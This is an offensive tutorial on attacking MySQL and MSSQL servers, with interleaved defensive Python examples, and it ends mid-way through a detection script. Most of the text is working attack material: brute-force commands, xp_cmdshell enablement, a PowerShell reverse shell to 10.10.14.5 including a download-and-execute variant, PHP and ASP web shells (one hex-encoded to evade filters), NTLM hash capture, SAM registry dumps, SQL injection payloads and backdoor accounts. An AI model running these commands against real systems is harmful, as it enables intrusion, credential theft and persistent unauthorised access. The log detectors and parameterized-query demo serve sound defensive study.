SQL Database Service Attacks and Exploitation

Database attack guide for MySQL and MSSQL covering authentication attacks, xp_cmdshell exploitation, hash stealing, impersonation, and linked servers.

Introduction

MySQL and Microsoft SQL Server (MSSQL) are the most widely deployed relational database management systems (RDBMS) in enterprise environments. These database servers store critical organizational data, including user credentials, personally identifiable information (PII), financial records, and proprietary business data.

Database services represent high-value targets due to:

  • Sensitive data storage: Credentials, PII, payment information, intellectual property
  • Privileged access: Database accounts often have elevated system privileges
  • Command execution: Built-in features for OS command execution
  • Lateral movement: Linked servers and trust relationships enable network pivoting
  • Credential harvesting: Authentication hash capture and password extraction
  • Configuration weaknesses: Default credentials, weak passwords, excessive permissions

Why Database Services Are Critical Targets

Database compromise often represents complete organizational breach:

  • MySQL: Over 4 million publicly exposed instances (Shodan)
  • MSSQL: Primary target for ransomware groups
  • Default credentials: Commonly left unchanged in production
  • Excessive privileges: sa/root accounts with system-level access
  • Cloud databases: AWS RDS, Azure SQL exposed to Internet
  • Application integration: Credentials stored in config files

Database attacks frequently lead to:

  • Data exfiltration: Complete database dumps
  • Privilege escalation: System-level command execution
  • Lateral movement: Access to linked servers and trusted systems
  • Ransomware deployment: Direct system access for encryption
  • Credential theft: Password and hash harvesting

Technical Background

MySQL Architecture

Default Port: TCP/3306

Key Components:

  • mysqld: MySQL server daemon
  • mysql: Command-line client
  • Authentication: mysql.user table stores credentials
  • Privileges: Database, table, and column-level permissions

MySQL Versions:

  • MySQL 5.x: Legacy, widespread deployment
  • MySQL 8.x: Modern, improved security features
  • MariaDB: MySQL fork with additional features

MSSQL Architecture

Default Ports:

  • TCP/1433: Standard MSSQL
  • TCP/2433: Hidden mode
  • UDP/1434: SQL Server Browser

Key Components:

  • SQL Server Engine: Core database service
  • SQL Server Agent: Job scheduling and automation
  • Integration Services: ETL and data processing
  • Reporting Services: Report generation

Authentication Modes:

  1. Windows Authentication (Integrated Security)

    • Uses Active Directory credentials
    • No password transmission
    • Kerberos or NTLM authentication
  2. Mixed Mode (SQL Server + Windows)

    • Both SQL and Windows accounts supported
    • SQL accounts with username/password
    • sa account enabled

Default System Databases

MySQL System Databases:

Database              Purpose
mysql                 User accounts, privileges, stored procedures
information_schema    Database metadata (tables, columns, privileges)
performance_schema    Server performance monitoring
sys                   Performance tuning and diagnostics

MSSQL System Databases:

Database    Purpose
master      System configuration and metadata
msdb        SQL Server Agent jobs and schedules
model       Template for new databases
tempdb      Temporary objects and storage
resource    System objects (read-only)

Enumeration

Port Scanning and Service Detection

# MySQL detection
nmap -p 3306 -sV 10.10.11.45

# MSSQL detection
nmap -p 1433,2433 -sV 10.10.11.45
nmap -p 1433 --script ms-sql-info 10.10.11.45

# Comprehensive SQL scan
nmap -p 1433,3306 -sV --script "mysql-* or ms-sql-*" 10.10.11.0/24

# UDP SQL Browser service
nmap -sU -p 1434 10.10.11.45

Example Output - MySQL:

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.7.38-0ubuntu0.18.04.1

Example Output - MSSQL:

PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2019 15.00.2000.00
| ms-sql-ntlm-info:
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: SQL01
|   DNS_Domain_Name: corp.local
|   DNS_Computer_Name: sql01.corp.local

MySQL Enumeration

# Banner grabbing
nc 10.10.11.45 3306

# Nmap MySQL scripts
nmap -p 3306 --script mysql-info 10.10.11.45
nmap -p 3306 --script mysql-databases --script-args mysqluser=root,mysqlpass=password 10.10.11.45
nmap -p 3306 --script mysql-users --script-args mysqluser=root,mysqlpass=password 10.10.11.45
nmap -p 3306 --script mysql-variables --script-args mysqluser=root,mysqlpass=password 10.10.11.45
nmap -p 3306 --script mysql-audit --script-args mysql-audit.username=root,mysql-audit.password=password 10.10.11.45

# Check for anonymous access
mysql -h 10.10.11.45 -u root
mysql -h 10.10.11.45 -u root -p

# Common MySQL default credentials
# root:root
# root:(blank)
# admin:admin

MSSQL Enumeration

# Nmap MSSQL scripts
nmap -p 1433 --script ms-sql-info 10.10.11.45
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 10.10.11.45
nmap -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt 10.10.11.45
nmap -p 1433 --script ms-sql-empty-password 10.10.11.45
nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=password 10.10.11.45

# MSSQL Browser enumeration
nmap -sU -p 1434 --script ms-sql-discover 10.10.11.0/24

Exploitation Techniques

Authentication Attacks

Test Default Credentials

MySQL Common Defaults:

# Test common credentials
mysql -h 10.10.11.45 -u root -p
# Password: (blank), root, password, admin, mysql

mysql -h 10.10.11.45 -u admin -padmin
mysql -h 10.10.11.45 -u dbuser -pdbuser

MSSQL Common Defaults:

# Using mssqlclient.py (Impacket)
mssqlclient.py sa@10.10.11.45
# Password: (blank), sa, password, Password123

# Using sqsh
sqsh -S 10.10.11.45 -U sa -P 'password'

# Using sqlcmd (Windows)
sqlcmd -S 10.10.11.45 -U sa -P 'password'

Brute-Force Attacks

MySQL Brute-Force:

# Using Hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.10.11.45

# Multiple users
hydra -L users.txt -P passwords.txt mysql://10.10.11.45

# Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
msf6 auxiliary(scanner/mysql/mysql_login) > run

MSSQL Brute-Force:

# Using Hydra
hydra -l sa -P /usr/share/wordlists/rockyou.txt mssql://10.10.11.45

# Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/mssql/mssql_login
msf6 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/mssql/mssql_login) > set USER_FILE users.txt
msf6 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE passwords.txt
msf6 auxiliary(scanner/mssql/mssql_login) > run

# Using Nmap
nmap -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt 10.10.11.45
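Brute-force attempts like the ones above leave a dense run of failed logins in the server logs. As an added example (not part of the original guide), the Python script below parses constructed SQL Server ERRORLOG lines (error 18456, "Login failed for user") and MySQL error-log "Access denied" lines, and raises one alert per client IP that accumulates `threshold` failures inside a sliding time window. The log lines are constructed samples, and the threshold and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log lines (not from any real system). The MSSQL lines follow the
# ERRORLOG layout for error 18456; the MySQL lines follow the "Access denied" message
# mysqld writes to its error log.
SAMPLE_LOG = """\
2025-01-10 09:15:02.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2025-01-10 09:15:02.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2025-01-10 09:15:02.55 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2025-01-10 09:15:03.02 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.14.5]
2025-01-10 09:15:03.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2025-01-10 09:20:11.00 Logon       Login failed for user 'app_user'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.22]
2025-01-10T09:16:00.000000Z 12 [Note] [Server] Access denied for user 'root'@'10.10.14.5' (using password: YES)
2025-01-10T09:16:00.200000Z 13 [Note] [Server] Access denied for user 'root'@'10.10.14.5' (using password: YES)
2025-01-10T09:16:00.400000Z 14 [Note] [Server] Access denied for user 'root'@'10.10.14.5' (using password: YES)
2025-01-10T09:16:00.600000Z 15 [Note] [Server] Access denied for user 'admin'@'10.10.14.5' (using password: YES)
"""

MSSQL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+Login failed for user "
    r"'(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]"
)
MYSQL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d+)Z .*Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<ip>[^']*)'"
)


def parse_failures(text):
    """Yield (timestamp, service, user, client_ip) for each failed-login line."""
    for line in text.splitlines():
        m = MSSQL_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), "mssql", m["user"], m["ip"]
            continue
        m = MYSQL_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%f"), "mysql", m["user"], m["ip"]


def detect_bruteforce(text, threshold=4, window_seconds=60):
    """Return one alert per (service, client_ip) whose failures reach `threshold`
    inside any sliding window of `window_seconds`; the usernames tried are included,
    since a changing username from one source is the password-spraying signature."""
    windows = defaultdict(deque)   # (service, ip) -> timestamps inside the current window
    users = defaultdict(set)
    alerts = {}
    for ts, service, user, ip in sorted(parse_failures(text)):
        key = (service, ip)
        q = windows[key]
        q.append(ts)
        users[key].add(user)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = {"service": service, "client_ip": ip,
                           "failures_in_window": len(q),
                           "users_tried": sorted(users[key]),
                           "first_seen": q[0], "alert_at": ts}
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

Both sources here alert on 10.10.14.5 (four failures within a second), while the single app_user failure from 10.10.10.22 stays below the threshold; raising the threshold to six suppresses both alerts, which is the knob to set against the normal mistyped-password rate of the environment.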

Connecting with Valid Credentials

MySQL Connection:

# Command-line client
mysql -h 10.10.11.45 -u root -p'Password123!'

# Specify database
mysql -h 10.10.11.45 -u admin -p'admin' -D database_name

# Execute query directly
mysql -h 10.10.11.45 -u root -p'password' -e "SELECT user,host FROM mysql.user"

MSSQL Connection:

# Using mssqlclient.py (Linux)
mssqlclient.py DOMAIN/username:<password>@10.10.11.45
mssqlclient.py sa:<password>@10.10.11.45 -windows-auth

# Using sqsh (Linux)
sqsh -S 10.10.11.45 -U sa -P 'Password123!' -h

# Using sqlcmd (Windows)
sqlcmd -S 10.10.11.45 -U sa -P 'Password123!'

# Windows Authentication
sqsh -S 10.10.11.45 -U DOMAIN\\username -P 'password' -h

Database Enumeration Post-Authentication

MySQL Enumeration

-- Show databases
SHOW DATABASES;

-- Select database
USE database_name;

-- Show tables
SHOW TABLES;

-- Describe table structure
DESCRIBE table_name;

-- List all users
SELECT user, host, authentication_string FROM mysql.user;

-- Check current user and privileges
SELECT USER(), CURRENT_USER();
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';

-- Version information
SELECT @@version;
SELECT version();

-- Database variables
SHOW VARIABLES;
SHOW VARIABLES LIKE 'secure_file_priv';

MSSQL Enumeration

-- Show databases
SELECT name FROM master.dbo.sysdatabases;
GO

-- Select database
USE database_name;
GO

-- Show tables
SELECT table_name FROM information_schema.tables;
GO

-- List columns
SELECT column_name FROM information_schema.columns WHERE table_name='users';
GO

-- List users and roles
SELECT name, type_desc FROM sys.server_principals;
GO

-- Check current user
SELECT SYSTEM_USER, USER_NAME();
GO

-- Check if sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
GO

-- Version information
SELECT @@VERSION;
GO

-- Server configuration
EXEC sp_configure;
GO

Command Execution

MSSQL - Enable xp_cmdshell

-- Check if xp_cmdshell is enabled
EXEC sp_configure 'xp_cmdshell';
GO

-- Enable xp_cmdshell (requires sysadmin)
EXEC sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO

EXEC sp_configure 'xp_cmdshell', 1;
GO
RECONFIGURE;
GO

-- Execute commands
EXEC xp_cmdshell 'whoami';
GO

EXEC xp_cmdshell 'ipconfig';
GO

EXEC xp_cmdshell 'net user';
GO

MSSQL - Reverse Shell via xp_cmdshell

# On attack machine - start listener
nc -lvnp 4444

# On attack machine - host reverse shell script
# revshell.ps1:
# $client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);
# $stream = $client.GetStream();
# [byte[]]$bytes = 0..65535|%{0};
# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
#     $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
#     $sendback = (iex $data 2>&1 | Out-String );
#     $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
#     $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
#     $stream.Write($sendbyte,0,$sendbyte.Length);
#     $stream.Flush()
# };
python3 -m http.server 8000

-- Download and execute PowerShell reverse shell
EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.5:8000/revshell.ps1'')"';
GO

-- Alternative: Direct PowerShell reverse shell
EXEC xp_cmdshell 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(''10.10.14.5'',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ''PS '' + (pwd).Path + ''> '';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"';
GO

MySQL - User Defined Functions (UDF)

MySQL has no built-in command-execution procedure comparable to xp_cmdshell, but a user-defined function (UDF) library such as lib_mysqludf_sys, loaded from the server's plugin directory, can provide one:

# Download lib_mysqludf_sys
wget https://github.com/mysqludf/lib_mysqludf_sys/releases/download/v1.0.4/lib_mysqludf_sys.so

# Upload to target MySQL server
# Method depends on access (web upload, file write, etc.)

-- Load UDF library (the .so must be in the server's plugin_dir)
USE mysql;
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('whoami');

-- Alternative functions
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
SELECT sys_eval('whoami');

File Operations

MySQL - Read Local Files

-- Check secure_file_priv setting
SHOW VARIABLES LIKE 'secure_file_priv';

-- Read file using LOAD_FILE()
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('C:\\Windows\\System32\\drivers\\etc\\hosts');

-- Read web application config
SELECT LOAD_FILE('/var/www/html/config.php');
SELECT LOAD_FILE('C:\\inetpub\\wwwroot\\web.config');
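Whether LOAD_FILE() and INTO OUTFILE work at all depends on secure_file_priv, which the first statement above checks. The Python function below is an added example (not code from the guide) that models the documented semantics of that variable: NULL disables file import and export, an empty string leaves them unrestricted, and a directory limits them to paths inside it. The prefix match on the normalized path, the default datadir and the sample paths are the example's own assumptions; real mysqld additionally resolves symlinks, and still requires the FILE privilege and filesystem permissions for the mysqld user.

```python
import posixpath


def normalize(path, datadir):
    """Resolve a path the way this model treats it: relative paths are taken relative
    to the data directory (as INTO OUTFILE does) and '.'/'..' segments are collapsed.
    Real mysqld also resolves symlinks with realpath(); that is not modelled here."""
    if not posixpath.isabs(path):
        path = posixpath.join(datadir, path)
    return posixpath.normpath(path)


def secure_file_priv_allows(secure_file_priv, path, datadir="/var/lib/mysql"):
    """Return True if LOAD_FILE()/INTO OUTFILE may touch `path` under the given
    secure_file_priv value (None stands for SQL NULL):
      None   -> file import/export disabled entirely
      ''     -> no restriction
      '<dir>'-> only paths inside that directory tree (modelled as a prefix match
                on the normalized path, with the separator appended so that
                /var/lib/mysql-files-evil is not mistaken for /var/lib/mysql-files)
    """
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    allowed_dir = posixpath.normpath(secure_file_priv)
    target = normalize(path, datadir)
    return target == allowed_dir or target.startswith(allowed_dir.rstrip("/") + "/")


def audit(secure_file_priv, paths, datadir="/var/lib/mysql"):
    """Map each candidate path to whether the setting permits it."""
    return {p: secure_file_priv_allows(secure_file_priv, p, datadir) for p in paths}


# Constructed sample paths, taken from the file-operation examples on this page
# plus a traversal attempt and a relative path.
SAMPLE_PATHS = [
    "/etc/passwd",
    "/var/www/html/shell.php",
    "/var/lib/mysql-files/export.csv",
    "/var/lib/mysql-files/../../../www/html/shell.php",   # traversal attempt
    "/var/lib/mysql-files-evil/export.csv",               # sibling directory with same prefix
    "export.csv",                                          # relative -> resolved under datadir
]

if __name__ == "__main__":
    for setting in (None, "", "/var/lib/mysql-files/"):
        print(repr(setting), audit(setting, SAMPLE_PATHS))
```

With the directory setting, only the export under /var/lib/mysql-files/ is permitted; the traversal collapses to /www/html/shell.php and is refused, as is the relative path (it lands in the datadir), which is why the hardening advice later on this page sets the variable to a dedicated directory rather than leaving it empty.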

MySQL - Write Files (Web Shell)

-- Write PHP web shell
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

-- Write ASP web shell
SELECT '<%
response.write(CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.ReadAll())
%>' INTO OUTFILE 'C:\\inetpub\\wwwroot\\shell.asp';

-- Hex-encoded payload (bypass filters)
SELECT 0x3C3F7068702073797374656D28245F4745545B22636D64225D293B203F3E INTO OUTFILE '/var/www/html/shell.php';
-- 0x3C3F... is hex for: <?php system($_GET["cmd"]); ?>

-- Access web shell
# http://10.10.11.45/shell.php?cmd=whoami

MSSQL - Write Files

-- Enable OLE Automation Procedures
EXEC sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO

EXEC sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO

-- Write web shell
DECLARE @OLE INT;
DECLARE @FileID INT;
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'C:\inetpub\wwwroot\shell.asp', 8, 1;
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<% response.write(CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.ReadAll()) %>';
EXECUTE sp_OADestroy @FileID;
EXECUTE sp_OADestroy @OLE;
GO

MSSQL - Read Files

-- Read local files using OPENROWSET
SELECT * FROM OPENROWSET(BULK N'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS Contents;
GO

-- Read web.config
SELECT * FROM OPENROWSET(BULK N'C:\inetpub\wwwroot\web.config', SINGLE_CLOB) AS Contents;
GO

-- Read user files
SELECT * FROM OPENROWSET(BULK N'C:\Users\Administrator\Desktop\passwords.txt', SINGLE_CLOB) AS Contents;
GO

MSSQL Hash Stealing

MSSQL can be made to authenticate to an attacker-controlled SMB server, which leaks the Net-NTLMv2 response of the SQL Server service account (commonly called the NTLMv2 hash):

Setup Responder/impacket-smbserver

# Using Responder
sudo responder -I tun0

# Using impacket-smbserver
sudo impacket-smbserver share ./ -smb2support

Trigger Authentication from MSSQL

-- Using xp_dirtree
EXEC master..xp_dirtree '\\10.10.14.5\share\';
GO

-- Using xp_subdirs
EXEC master..xp_subdirs '\\10.10.14.5\share\';
GO

-- Using xp_fileexist
EXEC master..xp_fileexist '\\10.10.14.5\share\file.txt';
GO

Capture Hash

Responder/smbserver will capture the NTLMv2 hash:

[SMB] NTLMv2-SSP Client   : 10.10.11.45
[SMB] NTLMv2-SSP Username : DOMAIN\sqlsvc
[SMB] NTLMv2-SSP Hash     : sqlsvc::DOMAIN:1122334455667788:ABC...

Crack with hashcat:

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

MSSQL Privilege Escalation

Check Current Privileges

-- Check current user
SELECT SYSTEM_USER;
SELECT USER_NAME();
GO

-- Check if sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
GO

-- List logins the current login may impersonate (IMPERSONATE on a server principal:
-- class 101, major_id = the login that can be impersonated)
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.major_id = b.principal_id
WHERE a.class = 101 AND a.permission_name = 'IMPERSONATE';
GO

Impersonate sa User

-- Impersonate sa
EXECUTE AS LOGIN = 'sa';
GO

-- Verify impersonation
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
GO

-- Execute commands as sa
EXEC sp_configure 'xp_cmdshell', 1;
GO
RECONFIGURE;
GO

EXEC xp_cmdshell 'whoami';
GO

-- Revert to original user
REVERT;
GO

MSSQL Linked Servers

Linked servers let one SQL Server instance run queries against another; the login mapping configured for the link decides which identity the query runs under on the remote side:

Enumerate Linked Servers

-- List linked servers
SELECT srvname, isremote FROM sysservers;
GO

-- Get detailed information
EXEC sp_linkedservers;
GO

-- Check linked server login mappings
EXEC sp_helplinkedsrvlogin;
GO

Query Linked Servers

-- Execute query on linked server
SELECT * FROM OPENQUERY([LINKED-SERVER], 'SELECT @@version');
GO

-- Check privileges on linked server
SELECT * FROM OPENQUERY([LINKED-SERVER], 'SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER(''sysadmin'')');
GO

-- Execute commands via linked server (if xp_cmdshell enabled)
EXEC ('EXEC xp_cmdshell ''whoami''') AT [LINKED-SERVER];
GO

Chain Linked Server Execution

-- Execute through multiple linked servers
SELECT * FROM OPENQUERY([LINKED-SERVER1], 'SELECT * FROM OPENQUERY([LINKED-SERVER2], ''SELECT @@version'')');
GO

-- Enable xp_cmdshell on linked server
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE') AT [LINKED-SERVER];
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE') AT [LINKED-SERVER];
GO

-- Execute commands
EXEC ('EXEC xp_cmdshell ''whoami''') AT [LINKED-SERVER];
GO
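Impersonation grants and linked-server login mappings compose: a login that can impersonate another login on one server, and that login's mapping on a linked server, together form a path. As an added example (not from the guide), the Python code below models a constructed two-server inventory as a graph of (server, login) states and searches it for paths that end at a sysadmin login, which is the review a defender would run before trusting either feature. The inventory, server names and logins are constructed; in practice the edges come from sys.server_permissions, sys.server_role_members and sp_helplinkedsrvlogin, as queried above.

```python
from collections import deque

# Constructed inventory (not a real environment). Per server:
#   sysadmin    - logins holding the sysadmin role
#   impersonate - grantee -> logins it may EXECUTE AS LOGIN
#   links       - linked server -> {local login: remote login it is mapped to}
INVENTORY = {
    "SQL01": {
        "sysadmin": {"sa"},
        "impersonate": {"webapp": {"reporting"}, "reporting": {"sa"}},
        "links": {"SQL02": {"webapp": "lnk_user", "sa": "sa"}},
    },
    "SQL02": {
        "sysadmin": {"sa", "svc_etl"},
        "impersonate": {"lnk_user": {"svc_etl"}},
        "links": {"SQL01": {"svc_etl": "sa"}},
    },
}


def privilege_path(inventory, start_server, start_login):
    """Breadth-first search over (server, login) states. Edges are IMPERSONATE grants
    on the same server and linked-server login mappings to other servers. Returns the
    shortest path to the first state holding sysadmin, or None if none is reachable."""
    start = (start_server, start_login)
    parent = {start: None}
    queue = deque([start])
    while queue:
        server, login = queue.popleft()
        if login in inventory[server]["sysadmin"]:
            path, node = [], (server, login)
            while node is not None:
                path.append(node)
                node = parent[node]
            return list(reversed(path))
        neighbours = [(server, t) for t in inventory[server]["impersonate"].get(login, ())]
        for remote, mapping in inventory[server]["links"].items():
            if login in mapping:
                neighbours.append((remote, mapping[login]))
        for state in neighbours:
            if state not in parent:
                parent[state] = (server, login)
                queue.append(state)
    return None


def all_escalation_paths(inventory):
    """Every non-sysadmin login that appears in a grant or mapping and can reach
    sysadmin on some server, with the path that gets it there."""
    findings = {}
    for server, data in inventory.items():
        logins = set(data["impersonate"]) | {l for m in data["links"].values() for l in m}
        for login in logins - data["sysadmin"]:
            path = privilege_path(inventory, server, login)
            if path:
                findings[(server, login)] = path
    return findings


if __name__ == "__main__":
    for (server, login), path in all_escalation_paths(INVENTORY).items():
        print(f"{server}/{login}: " + " -> ".join(f"{s}/{l}" for s, l in path))
```

In the constructed inventory the low-privileged webapp login reaches sa on SQL01 through two impersonation hops, and lnk_user on SQL02 reaches svc_etl, a sysadmin, with one; each finding points at a grant or mapping to revoke.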

SQL Injection Primer

While full SQL injection is covered in other modules, here are quick reference payloads for service exploitation:

Authentication Bypass

-- MySQL
' OR '1'='1' -- -
' OR '1'='1' #
admin' OR 1=1 -- -

-- MSSQL
' OR '1'='1' --
admin' OR 1=1 --

-- PostgreSQL
' OR '1'='1' --

UNION-based Injection

-- MySQL
' UNION SELECT NULL,NULL,NULL -- -
' UNION SELECT user(),database(),@@version -- -
' UNION SELECT username,password,NULL FROM users -- -

-- MSSQL
' UNION SELECT NULL,NULL,NULL --
' UNION SELECT SYSTEM_USER,DB_NAME(),@@VERSION --
' UNION SELECT username,password,NULL FROM users --

Time-based Blind Injection

-- MySQL
' AND SLEEP(5) -- -
' OR SLEEP(5) -- -

-- MSSQL
'; WAITFOR DELAY '00:00:05' --

-- PostgreSQL
'; SELECT pg_sleep(5) --
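The authentication-bypass payloads above work because the application builds its query by string concatenation. The added Python example below (not from the guide) runs the vulnerable form and the parameterized fix side by side against a constructed in-memory SQLite table, so the effect of `admin' OR 1=1 --` can be observed offline. SQLite is used only because it ships with Python; the same parameter binding is available in the MySQL and MSSQL drivers, and the constructed users and passwords are sample data.

```python
import sqlite3


def make_db():
    """In-memory users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "correct-horse"), ("alice", "s3cret")])
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the user's input becomes part of the SQL text, so a
    quote closes the literal and '--' comments out the password check."""
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Parameter binding: values travel separately from the SQL text, so quote
    characters and comment sequences in the input remain data."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def compare(conn, username, password):
    """Run both implementations on the same input for a side-by-side result."""
    return {"vulnerable": login_vulnerable(conn, username, password),
            "parameterized": login_parameterized(conn, username, password)}


if __name__ == "__main__":
    db = make_db()
    for u, p in [("admin", "correct-horse"), ("admin' OR 1=1 --", "wrong"), ("x", "' OR '1'='1' --")]:
        print(repr(u), repr(p), compare(db, u, p))
```

Only the real credentials log in through the parameterized version, while the concatenated version accepts both payloads; the UNION and time-based payloads above fail against it for the same reason.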

Post-Exploitation

Data Exfiltration

# MySQL: dump every database with mysqldump
mysqldump -h 10.10.11.45 -u root -p'password' --all-databases > dump.sql

# MSSQL: export a table with bcp
bcp "SELECT * FROM database.dbo.users" queryout users.txt -S 10.10.11.45 -U sa -P password -c

Credential Harvesting

-- MySQL: Extract users and hashes
SELECT user, authentication_string FROM mysql.user;

-- MSSQL: Dump password hashes
SELECT name, password_hash FROM sys.sql_logins;

-- MSSQL: Dump Windows hashes (requires sysadmin)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'reg save HKLM\SAM C:\temp\sam';
EXEC xp_cmdshell 'reg save HKLM\SYSTEM C:\temp\system';

Persistence

-- MySQL: Create backdoor user
CREATE USER 'backdoor'@'%' IDENTIFIED BY 'P@ssw0rd123!';
GRANT ALL PRIVILEGES ON *.* TO 'backdoor'@'%' WITH GRANT OPTION;
FLUSH PRIVILEGES;

-- MSSQL: Create backdoor login
CREATE LOGIN backdoor WITH PASSWORD = 'P@ssw0rd123!';
ALTER SERVER ROLE sysadmin ADD MEMBER backdoor;
GO

Detection and Defense

Monitoring Database Activity

MySQL Log Analysis:

-- Enable the general query log (every statement; high volume, so scope it to an investigation window)
SET GLOBAL general_log = 'ON';
-- Write to the mysql.general_log table and to the file, so both queries below work
SET GLOBAL log_output = 'FILE,TABLE';
SET GLOBAL general_log_file = '/var/log/mysql/mysql.log';

-- View the most recent statements
SELECT event_time, user_host, argument FROM mysql.general_log ORDER BY event_time DESC LIMIT 100;

-- Query the table for the file-access and UDF primitives used above
SELECT event_time, user_host, argument FROM mysql.general_log
WHERE argument LIKE '%LOAD_FILE%' OR argument LIKE '%INTO OUTFILE%' OR argument LIKE '%SONAME%'
ORDER BY event_time DESC;

# Or grep the file log (the path must be writable by the mysqld user)
grep -iE "load_file|into (out|dump)file|soname|sys_(exec|eval)" /var/log/mysql/mysql.log

MSSQL Log Analysis:

-- Check recent logins
SELECT login_time, login_name, host_name, program_name
FROM sys.dm_exec_sessions
WHERE is_user_process = 1
ORDER BY login_time DESC;

-- Monitor failed logins (Event ID 18456)
EXEC xp_readerrorlog 0, 1, N'Login failed';

-- Check for xp_cmdshell usage
SELECT * FROM sys.dm_exec_query_stats
CROSS APPLY sys.dm_exec_sql_text(sql_handle)
WHERE text LIKE '%xp_cmdshell%';
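The log queries above look for single keywords. The Python script below is an added example (not from the guide) that runs a small rule set over constructed MySQL general_log rows and MSSQL statement text, covering the primitives this page describes: file reads and writes, UDF loading, xp_cmdshell and the sp_configure calls that enable it, the UNC-path probes used for hash stealing, EXECUTE AS LOGIN, OLE Automation, and the GRANT ALL / sysadmin membership changes from the Persistence section. It also decodes 0x... hex literals before matching, so the hex-encoded web shell from the MySQL file-write section is still caught. Rule names, severities and the sample events are the example's own assumptions.

```python
import re

# Detection rules as (name, severity, regex); names and severities are this example's own.
RULES = [
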